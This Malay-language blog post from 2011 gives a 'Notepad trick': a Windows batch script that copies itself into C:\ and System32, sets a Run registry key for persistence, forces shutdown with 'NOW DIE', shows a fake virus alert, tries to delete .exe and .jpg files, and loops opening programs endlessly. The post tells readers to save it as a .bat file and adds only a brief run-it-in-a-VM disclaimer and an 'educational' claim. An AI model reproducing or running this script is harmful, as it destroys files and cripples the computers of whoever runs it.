Friday, 15 July 2011

Trik Notepad #1

Ne adalah cara untuk menyebabkan sistem windows rosak dan terpadam. Jangan RUN file ini di komputer anda sendiri.


Cara Melakukan


1. Buka Notepad anda

2. Salin script di bawah ke dalam notepad anda.


@echo off
IF EXIST c:\powershell.bat goto shut
set ba=c:\powershell.bat
set ne=c:\windows\system32\power.bat
copy %0 "%ba%"
copy %0 "%ne%"
reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "system" /t "REG_SZ" /d c:\windows\system32\power.bat /f
:shut
start shutdown -s -t 10 -c "NOW DIE"
echo MsgBox"Error Virus FOUND" > c:\msg.vbs
:fast
del (.exe)
del (.jpg)
start calc
start c:\msg.vbs
start notepad
start help
start cmd
goto fast2
:fast2
start calc
start c:\msg.vbs
start notepad
start help
start cmd
goto fast
echo on


3. Save fail nama_fail.bat , nama_fail terpulang pada korang tapi paling penting .bat tu.

PERHATIAN :

Hanya gunakan fail ini di Virtual Machine Komputer, Jangan RUN di komputer persendirian anda, saya tidak bertanggungjawab atas kerosakan yang bakal terjadi.

Fail ini dikongsi atas tujuan rujukan pelajaran sahaja. Perkongsian ini dibuat supaya anda dapat mempelajari sedikit kode seperti ini supaya anda tidak tertipu dan disalahgunakan oleh pihak yang tidak bertanggungjawab.


p/s : Kami Hack Kerana Anda Cuai

2 comments:

Cik Kay Jue said...

urm.. nak tanya.. kode ni di save untuk apa?

Anonymous said...

@Cik Kay Jue
Sebagai kegunaan pelajaran, ianya digunakan untuk merosakkan sesebuah sistem komputer....CKJ jangan tersilap guna ok.... :)